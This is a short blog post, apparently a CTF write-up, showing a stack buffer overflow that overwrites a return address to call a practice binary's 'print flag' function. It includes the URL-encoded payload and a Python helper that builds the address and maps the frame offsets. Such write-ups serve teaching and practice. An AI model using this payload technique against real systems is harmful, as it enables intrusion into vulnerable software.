Sun, Jun. 2nd, 2019, 04:03 pm
HackerOne CTF Hello World!

On this CTF you face a "What is your name?" prompt and an option to download the binary.

After downloading it and Ghidra, we open it up and see the name goes into a 0x20 buffer on the stack. OK, we should be able to overrun it and overwrite the return address. After plopping in some characters, it looks like I can enter 40, and on the next one I get a 'segmentation fault' message.

Well, I dump the ROP gadgets using the 'ROPgadget --binary vulnerable-bin' command in Kali and take a further look. OK, digging further into the binary, I see a 'print flag' function. OK, may not need the gadgets.

I just need to convert the address to the right byte order. Basically, take 0x004006ee and convert it to a 64-bit little-endian pointer that is URL-encoded: %ee%06%40%00%00%00%00%00

Boom, it prints the flag.
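
The address conversion above, worked through as an added example (not code from the original post): it packs the address little-endian, percent-encodes every byte, decodes it back, and shows why 40 characters fit before the crash. The function names are hypothetical, and the frame layout (buffer, then saved RBP, then return address, with no padding or stack canary) is an assumption.

```python
import struct
from urllib.parse import unquote_to_bytes

WORD = 8  # pointer size on x86-64


def encode_pointer(addr: int) -> str:
    """Pack addr as a little-endian 64-bit pointer and percent-encode every byte."""
    if not 0 <= addr < 2 ** 64:
        raise ValueError("address does not fit in 64 bits")
    raw = struct.pack("<Q", addr)  # least significant byte first
    # Encode all bytes, not only reserved ones: 0x00 and 0x06 cannot be
    # typed into a form field, so each byte is written as %xx.
    return "".join(f"%{b:02x}" for b in raw)


def decode_pointer(encoded: str) -> int:
    """Inverse of encode_pointer: percent-encoded bytes back to an integer."""
    raw = unquote_to_bytes(encoded)
    if len(raw) != WORD:
        raise ValueError(f"expected {WORD} bytes, got {len(raw)}")
    return struct.unpack("<Q", raw)[0]


def frame_offsets(buf_size: int) -> dict:
    """Byte ranges counted from the start of the buffer.

    Assumed layout: buffer, saved RBP, return address, all adjacent.
    """
    return {
        "buffer": (0, buf_size),
        "saved_rbp": (buf_size, buf_size + WORD),
        "return_address": (buf_size + WORD, buf_size + 2 * WORD),
    }


if __name__ == "__main__":
    print(encode_pointer(0x004006EE))
    print(hex(decode_pointer("%ee%06%40%00%00%00%00%00")))
    for name, (start, end) in frame_offsets(0x20).items():
        print(f"{name:15s} bytes {start:2d}..{end - 1:2d}")
```

Under the assumed layout, the 0x20 buffer plus the 8-byte saved RBP account for the 40 characters that are accepted, and the next byte is the first one to land in the return address.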